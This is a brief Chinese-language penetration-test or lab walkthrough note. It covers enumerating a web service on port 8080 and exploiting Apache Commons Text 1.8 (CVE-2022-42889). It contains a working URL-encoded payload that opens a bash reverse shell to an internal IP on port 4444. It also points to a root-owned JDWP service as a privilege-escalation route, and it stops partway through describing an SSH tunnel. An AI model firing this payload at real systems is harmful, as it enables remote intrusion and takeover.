192.150
8080端口有web,跑一下目录
CHANGELOG和search
Apache Commons Text 1.8——CVE-2022-42889
/search?query=%24%7bscript%3ajavascript%3ajava.lang.Runtime.getRuntime().exec('%2fbin%2fbash%20-c%20bash%24IFS%249-i%3e%26%2fdev%2ftcp%2f192.168.45.188%2f4444%3c%261')%7d
反弹shell成功后,通过命令查看当前服务,发现该主机有监听本机的8000端口,通过ps查询
发现开启了jdwp并且是由root账户启用的,故可能可以用来提权
首先通过ssh隧道将8000端口映射到本地。注意